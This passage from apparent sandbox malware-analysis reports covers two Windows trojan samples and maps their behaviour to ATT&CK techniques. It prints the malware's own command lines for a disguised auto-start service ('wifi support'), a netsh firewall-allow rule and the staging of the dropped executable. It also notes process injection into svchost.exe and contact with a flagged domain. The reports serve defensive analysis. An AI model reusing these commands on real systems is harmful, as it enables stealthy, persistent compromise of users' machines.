N/A]\n \"HFOPYUJF.EXE.67EE4A7B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has section name .text with entropy \"6.630102803682182\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has section name .text with entropy \"7.972855291312212\"\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has section name .reloc with entropy \"6.221515464885055\"\n \"hfopyujf.exe\" has section name .text with entropy \"6.630102803682182\"\n \"hfopyujf.exe\" has section name .text with entropy \"7.972855291312212\"\n \"hfopyujf.exe\" has section name .reloc with entropy \"6.221496050028631\"\n \"DISMHOST.EXE.67EE5D5B.bin\" has section name .text with entropy \"6.114767813379059\"\n \"DISMHOST.EXE.67EE5D5B.bin\" has section name .data with entropy \"6.4458000319803865\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005864)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" (UID: 00000000-00005864)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\dzhrysuy\\\\\" (UID: 00000000-00006104)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hfopyujf.exe\" %WINDIR%\\\\system32\\\\dzhrysuy\\\\\" (UID: 00000000-00005952)\n Spawned process \"sc.exe\" with commandline \"create dzhrysuy binPath= \"%WINDIR%\\\\system32\\\\dzhrysuy\\\\hfopyujf.exe /d\\\\\"C:\\\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00005960)\n Spawned process \"sc.exe\" with commandline \"description dzhrysuy \"wifi internet conection\"\" (UID: 00000000-00006008)\n Spawned process \"sc.exe\" with commandline \"start dzhrysuy\" (UID: 00000000-00005972)\n Spawned process \"hfopyujf.exe\" with commandline \"/d\"C:\\\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\"\" (UID: 00000000-00002240)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002780)\n Spawned process \"svchost.exe\" (UID: 00000000-00002700)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 588)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 568)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"hfopyujf.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"hfopyujf.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"hfopyujf.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"hfopyujf.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"hfopyujf.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002240)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"hfopyujf.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start dzhrysuy\" (UID: 00000000-00005972)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002780)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d
https://hybrid-analysis.com/sample/9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d
Hybrid Analysis - Um_unhooking
{"size": 12643840, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d", "sha256": "9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 5, "total_processes": 9, "total_signatures": 241, "extracted_files": [{"name": "jwifylqa.exe", "file_path": "%TEMP%\\jwifylqa.exe", "file_size": 5242368, "sha256": "e7e74777a9635b1f7e90867f7e7b6d8abace3d38648594ac1fb8b25a4c7d9eda", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe (PID: 2632)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jwifylqa.exe.67B73C09.bin", "file_size": 14740992, "sha256": "0dff68f91e41b719bd4d5c7bbc9f2f61568a8772655e1d85230e492b6111d1fa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "JWIFYLQA.EXE.67B73C0A.bin", "file_size": 14740992, "sha256": "0dff68f91e41b719bd4d5c7bbc9f2f61568a8772655e1d85230e492b6111d1fa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00002632", "name": "9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe", "normalized_path": "C:\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe", "sha256": "9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d"}, {"uid": "00000000-00003100", "parentuid": "00000000-00002632", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\qmuelfhl\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004684", "parentuid": "00000000-00002632", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\jwifylqa.exe\" %WINDIR%\\system32\\qmuelfhl\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00002932", "parentuid": "00000000-00002632", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create qmuelfhl binPath= \"%WINDIR%\\system32\\qmuelfhl\\jwifylqa.exe /d\\\"C:\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002356", "parentuid": "00000000-00002632", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description qmuelfhl \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00001072", "parentuid": "00000000-00002632", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start qmuelfhl", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005392", "parentuid": "00000000-00002632", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00003564", "name": "jwifylqa.exe", "normalized_path": "%WINDIR%\\system32\\qmuelfhl\\jwifylqa.exe", "command_line": "/d\"C:\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\"", "sha256": "0dff68f91e41b719bd4d5c7bbc9f2f61568a8772655e1d85230e492b6111d1fa"}, {"uid": "00000000-00005312", "parentuid": "00000000-00003564", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": 